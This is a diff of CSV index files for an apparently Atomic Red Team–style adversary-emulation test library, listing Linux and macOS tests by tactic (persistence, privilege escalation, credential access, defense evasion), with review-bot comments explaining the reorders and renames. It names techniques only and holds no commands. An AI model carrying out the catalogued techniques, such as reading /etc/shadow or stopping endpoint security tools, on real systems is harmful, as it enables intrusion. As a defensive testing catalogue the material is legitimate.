-privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual -persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual -persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual -persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash -persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash -persistence,T1098.004,SSH Authorized 
Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash -persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash 
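Review bot: the @@ -1,43 +1,8 @@ hunk of linux-index.csv adds credential-access,T1552.007,Container API,1,ListSecrets (43c3a49d-d15c-45e6-b303-f6e177e44a9a) with executor bash, which classifies a container API test as a Linux test. The CSV has no platform column, so the file a row lands in is the only platform signal a consumer gets; if the atomic declares containers in supported_platforms the generator is folding containers into linux, which should either be documented as intentional or get its own index alongside linux/macos. The 36 deletions in this hunk (18 privilege-escalation and 18 persistence rows) are not removals: the same GUIDs reappear further down after the collection and discovery sections, so apart from the one added row this hunk is a reorder.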
@@ -56,6 +21,26 @@ collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash +privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +privilege-escalation,T1548.003,Sudo and Sudo 
Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh 
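Review bot: the @@ -56,6 +21,26 @@ hunk re-adds the privilege-escalation section after collection; its 20 rows are the 18 deleted at the top of the file (same GUIDs, e.g. 7266d898-ac82-4ec0-97c7-436075d0d08e, 687dcb93-9656-4853-9c36-9977315e9d23, a74b2e07-5952-4c03-8b56-56274b076b61) with the T1546.004 and T1574.006 renames applied, plus the two new T1053.007 tests (ddfb0bc1-…, f2fa019e-…). Since only position changed for 18 of them, the generator's tactic ordering appears to have changed between runs; pinning the tactic order (for example to the ATT&CK matrix order) would keep the indexes diffable and let the genuine additions in a patch like this stand out.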
@@ -74,6 +59,8 @@ defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh +defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh 
@@ -85,8 +72,6 @@ defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh -defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -defense-evasion,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash 
@@ -155,6 +140,26 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh +persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual +persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual +persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual +persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +persistence,T1136.001,Local Account,1,Create a user account on a Linux 
system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash +persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash +persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash 
@@ -166,6 +171,9 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash +execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 0aab232a..987cd38e 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
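Review bot: the @@ -166,6 +171,9 @@ execution hunk of linux-index.csv adds the T1053.007 ListCronjobs/CreateCronjob rows with the same GUIDs (ddfb0bc1-3c3f-47e9-a298-550ecfefacbd, f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3) already added under persistence and privilege-escalation in this file, alongside T1609 ExecIntoContainer (d03bfcd3-ed87-49c8-8880-44bb772dea4b). Test GUID is therefore not unique within a CSV, only the (Tactic, Test GUID) pair is; any consumer that keys or deduplicates on GUID must expect one row per mapped tactic, and that is worth a sentence in the index header or the generator's README.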
@@ -1,46 +1,4 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash -privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh -privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh -privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh 
-privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh -privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual -persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual -persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual -persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual -persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash 
-persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash -persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash -persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh 
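Review bot: the 42 rows removed after the `@@ -1,46 +1,4 @@` header (every privilege-escalation and persistence row, from `T1546.004,.bash_profile and .bashrc` through `T1546.005,Trap`) are not deleted from the index; they reappear further down the same file in the two following hunks with identical GUIDs, test numbers and executors, so this hunk should be reviewed as a move rather than a removal. Counting confirms nothing is lost: 21 privilege-escalation rows and 21 persistence rows go out here and 21 plus 21 come back, with only two technique-name strings differing. What the reviewer should ask is why a doc-regeneration job produced a move at all, since a stable generator should emit these tactic blocks in the same place every run.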
@@ -59,6 +17,27 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password, collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash +privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on 
file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh 
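Review bot: the only substantive change in this hunk is two technique names, which differ from the rows removed at the top of the file: `T1037.004,Rc.common` becomes `T1037.004,RC Scripts` and `T1546.004,.bash_profile and .bashrc` becomes `T1546.004,Unix Shell Configuration Modification`. Both match the current ATT&CK names for those sub-techniques, so this reads as the generator picking up an upstream rename rather than a local edit, and the rename also explains why the two T1546.004 rows now sort last in the block instead of first (rows are ordered by technique name within a tactic). Worth confirming that the per-technique pages the index links to, `T1037.004/T1037.004.md` and `T1546.004/T1546.004.md`, carry the same new names in this commit so the index and the pages do not drift apart.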
@@ -143,6 +122,27 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh +persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual +persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual +persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual +persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual +persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash +persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +persistence,T1547.007,Re-opened 
Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash +persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash 